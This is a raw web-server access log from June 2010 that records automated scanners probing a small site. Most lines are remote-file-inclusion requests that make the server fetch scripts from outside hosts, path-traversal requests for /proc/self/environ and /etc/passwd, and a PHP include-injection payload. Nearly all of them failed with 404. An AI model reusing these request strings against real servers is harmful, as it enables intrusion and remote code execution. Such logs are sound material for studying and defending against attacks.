64.91.250.11 - - [01/Jun/2010:07:46:29 -0500] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:07:46:29 -0500] "GET /logs/access_log.1271116800//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:07:46:57 -0500] "GET /logs/access_log.1272326400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
207.46.199.54 - - [01/Jun/2010:07:48:55 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.153.152 - - [01/Jun/2010:07:51:26 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.153.152 - - [01/Jun/2010:07:51:26 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
91.121.153.152 - - [01/Jun/2010:07:51:30 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.153.152 - - [01/Jun/2010:07:51:31 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
87.250.255.243 - - [01/Jun/2010:07:52:31 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.187 - - [01/Jun/2010:07:56:55 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [01/Jun/2010:08:08:43 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:08:43 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:08:43 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:08:44 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.13.141 - - [01/Jun/2010:08:09:24 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [01/Jun/2010:08:09:52 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:09:53 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:11:19 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:11:20 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /logs/index1.php?menu=http://www.widefocus.co.nz/plugins/system/danger.txt??%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /index1.php?menu=http://www.widefocus.co.nz/plugins/system/danger.txt??%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /logs/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /logs/index1.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /errors.php?error=http://www.widefocus.co.nz/plugins/system/danger.txt??%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
69.175.75.210 - - [01/Jun/2010:08:13:18 -0500] "GET /logs/errors.php?error=http://www.widefocus.co.nz/plugins/system/danger.txt??%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
207.46.204.186 - - [01/Jun/2010:08:14:26 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 664329 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.11.114 - - [01/Jun/2010:08:21:07 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:08:21:07 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.30.142.216 - - [01/Jun/2010:08:22:17 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [01/Jun/2010:08:22:17 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.229.185 - - [01/Jun/2010:08:22:49 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:08:22:50 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.185.240.101 - - [01/Jun/2010:08:25:02 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
89.185.240.101 - - [01/Jun/2010:08:25:02 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
125.248.150.84 - - [01/Jun/2010:08:27:05 -0500] "GET //Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:27:05 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:27:06 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:27:56 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:27:56 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:27:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:28:29 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:28:29 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:28:29 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:28:31 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:28:31 -0500] "GET //Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:28:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
207.46.199.44 - - [01/Jun/2010:08:28:55 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.135.18 - - [01/Jun/2010:08:29:32 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
74.55.135.18 - - [01/Jun/2010:08:29:32 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
80.65.166.74 - - [01/Jun/2010:08:30:02 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:30:14 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.15.238.210 - - [01/Jun/2010:08:30:33 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:30:33 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.195.112.180 - - [01/Jun/2010:08:31:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.15.238.210 - - [01/Jun/2010:08:31:46 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:31:47 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.46.13.49 - - [01/Jun/2010:08:31:55 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.65.166.74 - - [01/Jun/2010:08:32:48 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:32:48 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:32:51 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.65.166.74 - - [01/Jun/2010:08:32:51 -0500] "GET /logs/access_log.1271894400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.55.135.18 - - [01/Jun/2010:08:34:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
74.55.135.18 - - [01/Jun/2010:08:34:31 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
74.55.135.18 - - [01/Jun/2010:08:34:31 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
212.47.221.153 - - [01/Jun/2010:08:34:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
212.47.221.153 - - [01/Jun/2010:08:34:39 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
207.46.199.191 - - [01/Jun/2010:08:34:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.91.250.11 - - [01/Jun/2010:08:34:55 -0500] "GET /error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:34:55 -0500] "GET /logs/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:34:56 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:34:58 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:34:58 -0500] "GET /error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:34:58 -0500] "GET /logs/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.47.221.153 - - [01/Jun/2010:08:35:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
212.47.221.153 - - [01/Jun/2010:08:35:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
212.47.221.153 - - [01/Jun/2010:08:35:10 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
216.15.238.210 - - [01/Jun/2010:08:35:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:35:19 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:35:20 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
64.91.250.11 - - [01/Jun/2010:08:36:10 -0500] "GET /logs/access_log.1271289600/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:36:12 -0500] "GET /logs/access_log.1271289600/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:38:47 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:38:47 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:38:47 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:11 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:11 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:11 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:28 -0500] "GET /logs/access_log.1272412800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:33 -0500] "GET /logs/access_log.1270512000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:39:51 -0500] "GET /logs/access_log.1272412800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.13.42 - - [01/Jun/2010:08:39:55 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.91.250.11 - - [01/Jun/2010:08:39:56 -0500] "GET /logs/access_log.1270512000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
216.15.238.210 - - [01/Jun/2010:08:41:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:41:07 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.15.238.210 - - [01/Jun/2010:08:41:07 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
64.91.250.11 - - [01/Jun/2010:08:42:10 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
64.91.250.11 - - [01/Jun/2010:08:42:14 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
94.23.11.114 - - [01/Jun/2010:08:42:34 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:08:42:34 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
125.248.150.84 - - [01/Jun/2010:08:42:37 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:42:37 -0500] "GET /logs/access_log.1271289600/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:42:38 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.248.150.84 - - [01/Jun/2010:08:42:55 -0500] "GET /logs/access_log.1262649600/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
89.185.240.101 - - [01/Jun/2010:08:43:44 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
